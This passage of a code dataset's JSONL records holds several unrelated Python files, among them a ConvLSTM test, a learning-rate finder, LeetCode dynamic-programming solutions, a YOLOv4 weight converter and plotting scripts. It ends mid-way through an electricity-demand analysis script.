convlstm_encoder_params[1]).to(device)\n their_convlstm_forecaster = Forecaster(convlstm_forecaster_params[0], convlstm_forecaster_params[1]).to(device)\n their_model = TheirEF(their_convlstm_encoder, their_convlstm_forecaster).to(device)\n\n # set up our models\n print(\"setting up our model\")\n our_model = OurEF_ConvLSTM(device, **get_HKO_config_ConvLSTM(c, h, w)).to(device)\n\n # check and assign state dicts\n print(\"checking model state dicts\")\n if not state_dicts_equal(their_model, our_model):\n raise AssertionError(\"State dicts not equal!\")\n our_model.load_state_dict(deepcopy(their_model.state_dict()))\n if not state_dicts_equal(their_model, our_model, check_values=True):\n raise AssertionError(\"State dicts not equal!\")\n\n # set up input\n print(\"setting up input\")\n their_x = torch.rand(context_frames, batch_size, c, h, w, device=device)\n our_x = their_x.clone().permute((1, 0, 2, 3, 4))\n\n # infer: their model\n print(\"infer: theirs\")\n their_model.eval()\n their_out = their_model(their_x)\n print(their_out.shape)\n\n # infer: our model\n print(\"infer: ours\")\n our_model.eval()\n our_out = our_model(our_x, pred_frames=pred_frames)[0].permute((1, 0, 2, 3, 4))\n\n # checks\n print(\"check results\")\n theirs = their_out.detach().cpu().numpy()\n ours = our_out.detach().cpu().numpy()\n if theirs.shape != ours.shape:\n raise AssertionError(f\"Prediction shapes are not equal. \"\n f\"Theirs: {theirs.shape}, ours: {ours.shape}\")\n # save_arr_hist(np.abs(theirs - ours), test_id)\n if not np.allclose(theirs, ours, rtol=0, atol=1e-4):\n raise AssertionError(\"Predictions are not equal.\")\n\n\ndef get_HKO_config_ConvLSTM(c, h, w):\n return {\n \"img_shape\": (c, h, w),\n \"action_size\": 0,\n \"tensor_value_range\": [0.0, 1.0],\n\n \"num_layers\": 3,\n \"enc_c\": [8, 64, 192, 192, 192, 192],\n \"dec_c\": [192, 192, 192, 64, 64, 8],\n \n \"enc_conv_names\": [\"conv1_leaky_1\", \"conv2_leaky_1\", \"conv3_leaky_1\"],\n \"enc_conv_k\": [7, 5, 3],\n \"enc_conv_s\": [5, 3, 2],\n \"enc_conv_p\": [1, 1, 1],\n \n \"dec_conv_names\": [\"deconv1_leaky_1\", \"deconv2_leaky_1\", \"deconv3_leaky_1\"],\n \"dec_conv_k\": [4, 5, 7],\n \"dec_conv_s\": [2, 3, 5],\n \"dec_conv_p\": [1, 1, 1],\n \n \"enc_rnn_k\": [3, 3, 3],\n \"enc_rnn_s\": [1, 1, 1],\n \"enc_rnn_p\": [1, 1, 1],\n \n \"dec_rnn_k\": [3, 3, 3],\n \"dec_rnn_s\": [1, 1, 1],\n \"dec_rnn_p\": [1, 1, 1],\n \n \"final_conv_1_name\": \"conv3_leaky_2\",\n \"final_conv_1_c\": 8,\n \"final_conv_1_k\": 3,\n \"final_conv_1_s\": 1,\n \"final_conv_1_p\": 1,\n \n \"final_conv_2_name\": \"conv3_3\",\n \"final_conv_2_k\": 1,\n \"final_conv_2_s\": 1,\n \"final_conv_2_p\": 0,\n }\n","sub_path":"tests/test_impl_match/_ef_conv_lstm.py","file_name":"_ef_conv_lstm.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"55722084","text":"from data_loader.data_loader import LMDBDataSet\nimport torchvision.transforms.functional as F\nimport torch.utils.data as data\nimport torch.optim as optim\nimport torch\nimport sys\nimport torch.nn as nn\nfrom img_show import wrong_img_save\nfrom dice_loss import dice_coeff\nfrom models import resnet3d\nfrom utils.logger import log\nfrom tqdm import tqdm\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nBATCH_SIZE = 256\n\ndef channel_max(tensor):\n max_i = torch.zeros(tensor.size(0))\n for i in range(0, tensor.size(0)):\n max_i[i] = torch.argmax(tensor[i, :, :])\n return max_i\n\ndef 
adjust_learning_rate(epoch):\n lr = optimizer.param_groups[0]['lr']\n print(lr)\n if (epoch % 30) == 0:\n lr = lr / 10\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\ndef save_models(epoch):\n torch.save(model.state_dict(), 'model_save/resnet34_{}.model'.format(epoch))\n print('checkpoint saves')\n\ndef test(epoch):\n model.eval()\n test_acc = 0.0\n sample_sum = 0.0\n batch_sum = 0.0\n for i, (images, labels_cls) in enumerate(test_loader):\n\n images = images.to(device)\n labels_cls = labels_cls.to(device)\n outputs_cls, out_layer1 = model(images.float())\n # test_out = out_layer1[1, :, 0, :, :]\n # test_out = torch.norm(test_out, dim=0)\n prediction = m(outputs_cls).ge(0.5).long().view(-1)\n test_acc += torch.sum(prediction == labels_cls)\n sample_sum += len(labels_cls)\n batch_sum += 1\n\n # if epoch > 0:\n for i_img in range(len(prediction)):\n if prediction[i_img] != labels_cls[i_img]:\n # out_img = images[i_img][0][0]\n # for out_i in range(1, images[i_img].shape[1]):\n # out_img = torch.cat((out_img, images[i_img][0][out_i]), 1)\n out_i_img = out_layer1[i_img, :, :, :, :]\n out_img = torch.cat((torch.norm(out_i_img[:, 0, :, :], dim=0), torch.norm(out_i_img[:, 1, :, :], dim=0)), 1)\n\n out_img = F.to_pil_image(out_img.cpu())\n out_img.save('./img_result/wrong_epoch{}_iter{}_img{}_label{}.jpg'.format(epoch, i, i_img, labels_cls[i_img]))\n\n else:\n out_i_img = out_layer1[i_img, :, :, :, :]\n out_img = torch.cat((torch.norm(out_i_img[:, 0, :, :], dim=0), torch.norm(out_i_img[:, 1, :, :], dim=0)), 1)\n\n out_img = F.to_pil_image(out_img.cpu())\n out_img.save('./img_result/true_epoch{}_iter{}_img{}_label{}.jpg'.format(epoch, i, i_img, labels_cls[i_img]))\n\n\n test_acc = test_acc.float() / sample_sum\n\n # writer.add_image('images', grid, 0)\n # writer.add_graph(model, images)\n # writer.close()\n return test_acc \n\n\ndef train(num_epochs):\n best_acc = 0.6\n for epoch in range(num_epochs):\n # adjust_learning_rate(epoch)\n model.train()\n log.info('{} epochs in total, {} epoch'.format(num_epochs, epoch))\n train_loss = 0.0\n batch_sum = 0.0\n sample_sum = 0.0\n train_acc = 0.0\n batch_lr = []\n batch_loss = []\n for i, (images, labels_cls) in tqdm(enumerate(train_loader), total=len(train_loader)):\n # print(i)\n\n\n if i != 0:\n optimizer.param_groups[0]['lr'] = optimizer.param_groups[0]['lr'] * 1.1\n \n # print(optim_para['lr'])\n if optimizer.param_groups[0]['lr'] > 1:\n break\n batch_lr.append(optimizer.param_groups[0]['lr'])\n\n images = images.to(device)\n labels_cls = labels_cls.to(device)\n optimizer.zero_grad()\n outputs_cls, _ = model(images)\n\n loss = loss_bce(outputs_cls.view(-1), labels_cls.float())\n \n loss.backward()\n optimizer.step()\n\n prediction = m(outputs_cls).ge(0.5).long().view(-1)\n train_acc += torch.sum(prediction == labels_cls)\n batch_sum += 1\n sample_sum += len(labels_cls)\n # print(prediction.shape, labels_cls.shape)\n # print(train_acc)\n batch_loss.append(loss.data)\n\n\n # plt.plot(batch_lr, batch_loss)\n with open('lr_loss.txt', 'w') as outputs:\n for i in range(len(batch_loss)):\n outputs.write(str(batch_lr[i]) + ' ' + '{:.5f}'.format(batch_loss[i].data) + '\\n')\n\n\n # test_acc = test(epoch)\n \n return 0\n\nif __name__ == '__main__':\n cuda_avail = torch.cuda.is_available()\n device = \"cuda:0\" if cuda_avail else \"cpu\"\n m = nn.Sigmoid().to(device)\n loss_bce = nn.BCEWithLogitsLoss().to(device)\n loss_l1 = nn.SmoothL1Loss().to(device)\n\n train_dataset = LMDBDataSet(\"./data_loader/dataset/train\", 0.0, 1.0)\n 
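# LMDBDataSet(path, start, end): the trailing (0.0, 1.0) pair presumably\n    # selects which fraction of the LMDB records to use; here the full range.\n    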
test_dataset = LMDBDataSet(\"./data_loader/dataset/test\", 0.0, 1.0)\n train_loader = data.DataLoader(train_dataset, batch_size= BATCH_SIZE, num_workers=8)\n test_loader = data.DataLoader(test_dataset, batch_size= BATCH_SIZE, num_workers=8)\n\n print('hello1')\n lamda_log = list()\n # for lamda in range(50, 10100, 20):\n model = resnet3d.resnet18()\n model = model.to(device)\n # optimizer = optim.Adam(model.parameters(), lr=0.001, weight_decay= 0.001)\n optimizer = optim.SGD(model.parameters(), lr=0.000001)\n\n test_flag = False\n if test_flag:\n path = './model_save/model_9_acc_0.7400000095367432.model'\n model.load_state_dict(torch.load(path)) \n\n total_test_acc = train(1)\n # lamda_log.append([lamda, total_test_acc])","sub_path":"3d_new_test_mixup/find_lr.py","file_name":"find_lr.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"428621201","text":"# 213. House robber II \n# You are a professional robber planning to rob houses along a street. Each house has a certain amount of money stashed. All houses at this place are arranged in a circle. That means the first house is the neighbor of the last one. Meanwhile, adjacent houses have a security system connected, and it will automatically contact the police if two adjacent houses were broken into on the same night.\n\n# Given a list of non-negative integers nums representing the amount of money of each house, return the maximum amount of money you can rob tonight without alerting the police.\n\n# Example 1:\n\n# Input: nums = [2,3,2]\n# Output: 3\n# Explanation: You cannot rob house 1 (money = 2) and then rob house 3 (money = 2), because they are adjacent houses.\n# Example 2:\n\n# Input: nums = [1,2,3,1]\n# Output: 4\n# Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n# Total amount you can rob = 1 + 3 = 4.\n# Example 3:\n\n# Input: nums = [0]\n# Output: 0\n \n\n# Constraints:\n\n# 1 <= nums.length <= 100\n# 0 <= nums[i] <= 1000\n\nclass Solution(object):\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 1:\n return nums[0]\n \n left = self.checkHouses(nums[0:-1])\n right = self.checkHouses(list(reversed(nums[1:])))\n return max(left, right)\n \n def checkHouses(self, houses):\n loot = [0] * len(houses)\n for i, num in enumerate(houses):\n if i == 0:\n loot[i] = num\n elif i == 1:\n loot[i] = max(loot[i-1], num)\n else:\n loot[i] = max(loot[i-1], loot[i-2] + num)\n \n return loot[-1]\n \n \n","sub_path":"medium/213.py","file_name":"213.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"18213766","text":"from functools import lru_cache\n\ndef simetricen(niz):\n return niz == niz[::-1]\n\n@lru_cache(maxsize=None)\ndef stevilo_delov (w, je_simetricen):\n if w == '':\n return 0\n if je_simetricen(w):\n return 1\n options = [stevilo_delov(w[:i], je_simetricen) + \n stevilo_delov(w[i:], je_simetricen) for i in range(1, len(w))]\n n = min(options)\n return n\n\n@lru_cache(maxsize=None)\ndef razdeli(w, je_simetricen):\n if len(w) == 0:\n return (0, [w])\n if je_simetricen(w):\n return (1, [w])\n options = None\n for i in range(1, len(w)):\n nl, wl = razdeli(w[:i], je_simetricen)\n nr, wr = razdeli(w[i:], je_simetricen)\n k, ws = nl + nr, wl + wr\n\n if options == None:\n options = (k, ws)\n \n else:\n m, l = options\n if k < m :\n options = (k, ws)\n return options\n\ndef 
vsotno_simetricen(niz):\n    if len(niz) == 1:\n        return True\n    l = [int(c) for c in niz]\n    n = int(len(niz) / 2)\n    return sum(l[:n]) == sum(l[n:])\n","sub_path":"izpiti/2018-07-06/test_3naloga.py","file_name":"test_3naloga.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"115083640","text":"from jaratoolbox.test.nick import behavioranalysis_vnick as behavioranalysis\nfrom jaratoolbox import extrastats\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nsalChordEsts = np.zeros([2, 4])\nmusChordEsts = np.zeros([2, 4])\nsalModEsts = np.zeros([2, 4])\nmusModEsts = np.zeros([2, 4])\n\n\nanimals = ['amod002', 'amod003']\nnAnimals = len(animals)\n\nmuscimolSessions = ['20160413a', '20160415a', '20160417a', '20160419a', '20160421a']\nsalineSessions = ['20160412a', '20160414a', '20160416a', '20160418a', '20160420a']\n\n\n# Helper defined before the figure loop below so the script runs top to bottom.\ndef plot_psycurve_fit_and_data(bdata, plotColor):\n    #Calculate the psychometric\n    rightTrials = bdata['choice']==bdata.labels['choice']['right']\n    freqEachTrial = bdata['targetFrequency']\n    valid = bdata['valid']\n    (possibleValues,fractionHitsEachValue,ciHitsEachValue,nTrialsEachValue,nHitsEachValue) = behavioranalysis.calculate_psychometric(rightTrials, freqEachTrial, valid)\n\n    #Calculate the psycurve fit\n    estimate = behavioranalysis.psycurve_fit_from_bdata(bdata, plotFits=0)\n\n    #Plot in log2 space(fit is already in this space)\n    possibleValues = np.log2(possibleValues)\n\n    #Plot the stuff\n    ax = plt.gca()\n    plt.hold(1)\n    xRange = possibleValues[-1]-possibleValues[1]\n    fitxval = np.linspace(possibleValues[0]-0.1*xRange,possibleValues[-1]+0.1*xRange,40)\n    fityvals = extrastats.psychfun(fitxval, *estimate)\n\n    upperWhisker = ciHitsEachValue[1,:]-fractionHitsEachValue\n    lowerWhisker = fractionHitsEachValue-ciHitsEachValue[0,:]\n    (pline, pcaps, pbars) = plt.errorbar(possibleValues, fractionHitsEachValue,\n                                         yerr = [lowerWhisker, upperWhisker],color='k', fmt='none')\n    pdots = plt.plot(possibleValues, fractionHitsEachValue, 'o',mec='none',mfc='k',ms=8)\n\n    plt.setp(pcaps, color=plotColor)\n    plt.setp(pbars, color=plotColor)\n    plt.setp(pdots, markerfacecolor=plotColor)\n\n    if np.unique(freqEachTrial)[0]<1000: #If Hz\n        ax.set_xticks(possibleValues)\n        ax.set_xticklabels(np.unique(freqEachTrial))\n        plt.xlabel('Frequency (Hz)')\n    else:\n        ax.set_xticks(possibleValues)\n        freqLabels = ['{:.03}'.format(x) for x in np.unique(freqEachTrial)/1000.0]\n
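        # For tones at or above 1 kHz, label the ticks in kHz with three\n        # significant digits instead of raw Hz values.\n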
        ax.set_xticklabels(freqLabels)\n        plt.xlabel('Frequency (kHz)')\n\n\n    ax.plot(fitxval, fityvals, color=plotColor)\n    plt.ylim([0, 1])\n    plt.ylabel('Fraction Rightward Trials')\n\n    return estimate\n\n\n## -- Figure with all animals\n\nplt.figure()\n\nfor indAnimal, animal in enumerate(animals):\n    muscimolDataObjs, muscimolSoundTypes = behavioranalysis.load_behavior_sessions_sound_type(animal, muscimolSessions)\n    salineDataObjs, salineSoundTypes = behavioranalysis.load_behavior_sessions_sound_type(animal, salineSessions)\n\n    mdataChords = muscimolDataObjs[muscimolSoundTypes['chords']]\n    sdataChords = salineDataObjs[salineSoundTypes['chords']]\n\n    mdataMod = muscimolDataObjs[muscimolSoundTypes['amp_mod']]\n    sdataMod = salineDataObjs[salineSoundTypes['amp_mod']]\n\n    plt.subplot2grid((nAnimals, 2), (indAnimal, 0))\n    salChordEsts[indAnimal,:] = plot_psycurve_fit_and_data(sdataChords, 'k')\n    musChordEsts[indAnimal,:] = plot_psycurve_fit_and_data(mdataChords, 'r')\n    plt.title('{},{}'.format(animal, 'chords'))\n\n    plt.subplot2grid((nAnimals, 2), (indAnimal, 1))\n    salModEsts[indAnimal,:] = plot_psycurve_fit_and_data(sdataMod, 'k')\n    musModEsts[indAnimal,:] = plot_psycurve_fit_and_data(mdataMod, 'r')\n    plt.title('{},{}'.format(animal, 'amp_mod'))\n","sub_path":"oldjaratest/nick/test042_fittedOverallMuscimolPerformance.py","file_name":"test042_fittedOverallMuscimolPerformance.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"166546535","text":"'''\nThis implementation is based on https://github.com/hhaAndroid/mmdetection-mini\n'''\n\nfrom rfvision.tools.darknet2torch.darknet_weight_converter import WeightLoader\nfrom rflib.cnn import ConvModule\nfrom rfvision.components.backbones.cspdarknet import CSPBlock, ResBlock\nfrom rfvision.components.necks.yolo_neck import MakeNConv, FuseStage, SpatialPyramidPooling\nimport torch.nn as nn\nimport torch\nfrom collections import OrderedDict\n\nclass Head(nn.Module):\n    def __init__(self, nchannels, nanchors, nclasses):\n        super().__init__()\n        cfg = dict(conv_cfg=None,\n                   norm_cfg=dict(type='BN', requires_grad=True),\n                   act_cfg=dict(type='LeakyReLU', negative_slope=0.1))\n        mid_nchannels = 2 * nchannels\n        layer_list = [\n            ConvModule(nchannels, mid_nchannels, 3, 1, 1, **cfg),\n            nn.Conv2d(mid_nchannels, nanchors * (5 + nclasses), 1, 1, 0),\n        ]\n        self.feature = nn.Sequential(*layer_list)\n\n    def forward(self, data):\n        x = self.feature(data)\n        return x\n\n\n\nclass YOLOV4(nn.Module):\n    def __init__(self, layers=(1, 2, 8, 8, 4), pretrained=False):\n        super().__init__()\n        cfg = dict(conv_cfg=None,\n                   norm_cfg=dict(type='BN', requires_grad=True),\n                   act_cfg=dict(type='LeakyReLU', negative_slope=0.1))\n        self.custom_layers = (CSPBlock, ResBlock, Head, MakeNConv, FuseStage)\n        num_anchors = (3, 3, 3)\n        in_channels_list = (512, 256, 128)\n        self.inplanes = 32\n        self.conv0 = ConvModule(3, self.inplanes, kernel_size=3, stride=1, **cfg)\n        self.feature_channels = [64, 128, 256, 512, 1024]\n\n        self.backbone = nn.ModuleList([\n            CSPBlock(self.inplanes, self.feature_channels[0], layers[0], first=True),\n            CSPBlock(self.feature_channels[0], self.feature_channels[1], layers[1], first=False),\n            CSPBlock(self.feature_channels[1], self.feature_channels[2], layers[2], first=False),\n            CSPBlock(self.feature_channels[2], self.feature_channels[3], layers[3], first=False),\n            CSPBlock(self.feature_channels[3], self.feature_channels[4], layers[4], first=False)\n        ])\n\n        self.neck1 = nn.ModuleList([\n            # neck1\n            nn.Sequential(MakeNConv(1024, 512, 3, **cfg),\n                          SpatialPyramidPooling(),\n                          MakeNConv(2048, 512, 3, **cfg)),\n\n            nn.Sequential(FuseStage(512, **cfg),\n                          MakeNConv(512, 256, 5, **cfg)),\n\n            nn.Sequential(FuseStage(256, **cfg),\n                          MakeNConv(256, 128, 5, **cfg)),\n        ])\n        self.head3 = nn.ModuleList([nn.Sequential(Head(in_channels_list[2], num_anchors[2], 80)),])\n        self.neck2 = nn.ModuleList([nn.Sequential(FuseStage(128, **cfg, is_reversal=True), MakeNConv(512, 256, 5, **cfg)),])\n        self.head2 = nn.ModuleList([nn.Sequential(Head(in_channels_list[1], num_anchors[1], 80)),])\n        self.neck3 = nn.ModuleList([nn.Sequential(FuseStage(256, **cfg, is_reversal=True), MakeNConv(1024, 512, 5, **cfg)),])\n        self.head1 = nn.ModuleList([nn.Sequential(Head(in_channels_list[0], num_anchors[0], 80)),])\n        self.init_weights(pretrained)\n\n    def __modules_recurse(self, mod=None):\n        \"\"\" This function will recursively loop over all module children.\n        Args:\n            mod (torch.nn.Module, optional): Module to loop over; Default **self**\n        \"\"\"\n        if mod is None:\n            mod = self\n
        for module in mod.children():\n            if isinstance(module, (nn.ModuleList, nn.Sequential, self.custom_layers)):\n                yield from self.__modules_recurse(module)\n            else:\n                yield module\n\n    def init_weights(self, pretrained=None):\n        if pretrained is not None:\n            weights = WeightLoader(pretrained)\n            for module in self.__modules_recurse():\n                try:\n                    weights.load_layer(module)\n                    print(f'Layer loaded: {module}')\n                    if weights.start >= weights.size:\n                        print(f'Finished loading weights [{weights.start}/{weights.size} weights]')\n                        break\n                except NotImplementedError:\n                    print(f'Layer skipped: {module.__class__.__name__}')\n\n    def forward(self, x):\n        return x\n\nif __name__ == '__main__':\n    weight_path = '/home/hanyang/weights/yolov4.conv.137'\n    m = YOLOV4(pretrained=weight_path)\n    new_state_dict = OrderedDict()\n\n    for k, v in m.state_dict().items():\n        if k.startswith('conv0'):\n            name = k.replace('conv0', 'backbone.conv0')\n        elif k.startswith('backbone'):\n            name = k.replace('backbone', 'backbone.stages')\n        elif k.startswith('neck1'):\n            name = k.replace('neck1', 'neck.layers')\n        elif k.startswith('neck2'):\n            name = k.replace('neck2.0', 'neck.layers.3')\n        elif k.startswith('neck3'):\n            name = k.replace('neck3.0', 'neck.layers.4')\n        elif k.startswith('head1.0.0.feature.0'):\n            name = k.replace('head1.0.0.feature.0', 'bbox_head.convs_bridge.0')\n        elif k.startswith('head2.0.0.feature.0'):\n            name = k.replace('head2.0.0.feature.0', 'bbox_head.convs_bridge.1')\n        elif k.startswith('head3.0.0.feature.0'):\n            name = k.replace('head3.0.0.feature.0', 'bbox_head.convs_bridge.2')\n        elif k.startswith('head1.0.0.feature.1'):\n            name = k.replace('head1.0.0.feature.1', 'bbox_head.convs_pred.0')\n        elif k.startswith('head2.0.0.feature.1'):\n            name = k.replace('head2.0.0.feature.1', 'bbox_head.convs_pred.1')\n        elif k.startswith('head3.0.0.feature.1'):\n            name = k.replace('head3.0.0.feature.1', 'bbox_head.convs_pred.2')\n        else:\n            name = k\n        new_state_dict[name] = v\n    data = {\"state_dict\": new_state_dict}\n    torch.save(data, '/home/hanyang/weights/yolov4_conv_137.pth')","sub_path":"rfvision/tools/darknet2torch/yolov4.py","file_name":"yolov4.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"488904951","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nimport matplotlib.pyplot as plt\nimport numpy\n\n# fix random seed for reproducibility\n\nseed = 7\n\nnumpy.random.seed(seed)\n\ndataset = numpy.loadtxt(\"pima-indians-diabetes.csv\", delimiter=',')\n\nprint(dataset)\nX = dataset[:, 0:8]\nY = dataset[:, 8]\n\n# create model\n\nmodel = Sequential()\nmodel.add(Dense(12, input_dim=8, activation='relu'))\nmodel.add(Dense(8, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n# compile model\nmodel.compile(loss=\"binary_crossentropy\", optimizer='adam', metrics=['accuracy'])\nfilepath = \"weights-improvement-{epoch:02d}-{val_loss:.2f}.hdf5\"\n\n# The keyword is 'mode' (not 'model'); val_loss improves downward, so 'min'\n# is the appropriate comparison mode for saving the best checkpoint.\ncheckpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\n\ncallbacks_list = [checkpoint]\n\nmodel.fit(X, Y, validation_split=0.33, epochs=150, batch_size=10, callbacks=callbacks_list, verbose=0)","sub_path":"myworkspace/translate_tutorial/ch14.py","file_name":"ch14.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"372559399","text":"\"\"\"\n
656. Coin Path\n\nGiven an array A (index starts at 1) consisting of N integers: A1, A2, ..., AN and an integer B.\nThe integer B denotes that from any place (suppose the index is i) in the array A,\nyou can jump to any one of the places in the array A indexed i+1, i+2, …, i+B if that place can be jumped to.\nAlso, if you step on the index i, you have to pay Ai coins. If Ai is -1, it means you can’t jump to the place indexed i in the array.\n\nNow, you start from the place indexed 1 in the array A, and your aim is to reach the place indexed N using the minimum coins.\nYou need to return the path of indexes (starting from 1 to N) in the array you should take to get to the place indexed N using minimum coins.\n\nIf there are multiple paths with the same cost, return the lexicographically smallest such path.\n\nIf it's not possible to reach the place indexed N then you need to return an empty array.\n\nExample 1:\n\nInput: [1,2,4,-1,2], 2\nOutput: [1,3,5]\n\n\nExample 2:\n\nInput: [1,2,4,-1,2], 1\nOutput: []\n\n\nNote:\n\nPath Pa1, Pa2, ..., Pan is lexicographically smaller than Pb1, Pb2, ..., Pbm,\nif and only if at the first i where Pai and Pbi differ, Pai < Pbi; when no such i exists, then n < m.\nA1 >= 0. A2, ..., AN (if exist) will be in the range of [-1, 100].\nLength of A is in the range of [1, 1000].\nB is in the range of [1, 100].\n\n\"\"\"\n\n\nclass CheapestJump:\n\n    \"\"\"\n    Approach #2 Using Memoization [Accepted]\n    Algorithm\n\n    In the recursive solution just discussed, a lot of duplicate function calls are made, since we are considering the same index through multiple paths.\n    To remove this redundancy, we can make use of memoization.\n\n    We keep a memo array, such that memo[i] is used to store the minimum cost of jumps to reach the end of the array A.\n    Whenever the value for any index is calculated once, it is stored in its appropriate location.\n    Thus, next time whenever the same function call is made, we can return the result directly from this memo array, pruning the search space to a great extent.\n\n    Complexity Analysis\n\n    Time complexity : O(nB). The memo array of size n is filled only once. We also do a traversal over the next array,\n    which can go up to B steps. Here, n refers to the number of elements in the given array A.\n\n    Space complexity : O(n). The depth of the recursion tree can grow up to n. A next array of size n is used.\n    \"\"\"\n    def doit_dp_dfs(self, A, B):\n        \"\"\"\n        :type A: List[int]\n        :type B: int\n        :rtype: List[int]\n        \"\"\"\n        path = [-1 for _ in range(len(A))]\n\n        def dfs(pos, path, memo):\n\n            if pos in memo:\n                return memo[pos]\n\n            if pos == len(A) - 1:\n                return A[pos]\n\n            res = float('inf')\n            for j in range(pos+1, pos+B+1):\n\n                if j == len(A):\n                    break\n\n                if A[j] != -1:\n                    d = dfs(j, path, memo)\n                    if d < res:\n                        res = d\n                        path[pos] = j\n\n            res += A[pos]\n            memo[pos] = res\n            return res\n\n        if A[-1] == -1:\n            return []\n\n        dfs(0, path, {})\n        res = []\n        i = 0\n        while 0 <= i < len(path):\n            res.append(i+1)\n            i = path[i]\n\n        return [] if res[-1] != len(A) else res\n\n    \"\"\"\n    Approach #3 Using Dynamic Programming [Accepted]\n    Algorithm\n\n    From the solutions discussed above, we can observe that the cost of jumping till the end of the array A\n    starting from the index i is only dependent on the elements following the index i and not the ones before it.\n    This inspires us to make use of Dynamic Programming to solve the current problem.\n\n    We again make use of a next array to store the next jump locations. We also make use of a dp array with the same size as that of the given A array.\n    dp[i] is used to store the minimum cost of jumping till the end of the array A, starting from the index i.\n    We start with the last index as the current index and proceed backwards, filling the next and dp arrays.\n\n    With i as the current index, we consider all the next possible positions from i+1, i+2,..., i+B, and determine the position, j,\n    which leads to a minimum cost of reaching the end of A, which is given by A[i]+dp[j]. We update next[i] with this corresponding index.\n    We also update dp[i] with the minimum cost, to be used by the previous indices' cost calculations.\n\n    At the end, we again jump over the indices as per the next array and put these indices in the res array to be returned.\n\n    Complexity Analysis\n\n    Time complexity : O(nB). We need to consider all the possible B positions for every current index considered in the A array.\n    Here, n refers to the number of elements in A.\n\n    Space complexity : O(n). dp and next arrays of size n are used.\n    \"\"\"\n    def doit_dp(self, A, B):\n\n        N = len(A)\n        dp = [-1 for _ in range(N)]\n        path = [-1 for _ in range(N)]\n        dp[-1] = A[-1]\n\n        for i in range(N-2, -1, -1):\n            if A[i] == -1:\n                continue\n\n            for j in range(i + 1, min(len(A), i + B + 1)):\n                if dp[j] == -1:\n                    continue\n\n                if dp[i] == -1 or dp[i] > dp[j]:\n                    dp[i] = dp[j]\n                    path[i] = j\n\n            dp[i] += A[i]\n\n        i, res = 0, []\n        while 0 <= i < len(A):\n            res.append(i+1)\n            i = path[i]\n\n        if res[-1] != len(A):\n            return []\n\n        return res\n\n\n\n\n\n\nif __name__ == '__main__':\n\n    res = CheapestJump().doit_dp([1, 2, 4, -1, 2], 2)\n\n\n","sub_path":"PythonLeetcode/Leetcode/656_CoinPath.py","file_name":"656_CoinPath.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"278950807","text":"import pandas as pd\nfrom NEMPRO import historical_inputs, planner, units, residual_demand\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\n\nraw_data_cache = 'C:/Users/nick/Documents/nem_data'\n\n# Build data set for calibrating the dispatch planner's price forecasting model.\nstart_time_historical_data = '2019/01/01 00:00:00'\nend_time_historical_data = '2020/01/01 00:00:00'\n\nregions_short_names = {\n    'QLD1': 'qld',\n    'NSW1': 'nsw',\n    'VIC1': 'vic',\n    'SA1': 'sa',\n    'TAS1': 'tas'\n}\n\nhistorical_data = residual_demand.get(start_time_historical_data, end_time_historical_data, raw_data_cache)\n\n\nfor region in ['QLD1', 'NSW1', 'VIC1', 'SA1', 'TAS1']:\n    frac_peak_demand = residual_demand.get_region_fraction_of_max_residual_demand(historical_data, region)\n    regional_data = historical_data[historical_data['REGIONID'] == region].loc[:, ['SETTLEMENTDATE', 'RESIDUALDEMAND']]\n    forward_data = regional_data.copy()\n\n    r = regions_short_names[region]\n    regional_data = regional_data.rename(columns={'RESIDUALDEMAND': '{}-demand'.format(r)})\n    regional_data['{}-energy'.format(r)] = regional_data['{}-demand'.format(r)]\n    regional_data['{}-energy-fleet-dispatch'.format(r)] = 0.0\n    regional_data = regional_data.reset_index(drop=True)\n    regional_data['interval'] = regional_data.index\n    regional_data = regional_data.drop(columns=['SETTLEMENTDATE'])\n\n    forward_data = forward_data.reset_index(drop=True)\n    forward_data['interval'] = forward_data.index\n    settlement_dates = forward_data.loc[:, ['interval', 'SETTLEMENTDATE', 'RESIDUALDEMAND']]\n    forward_data = 
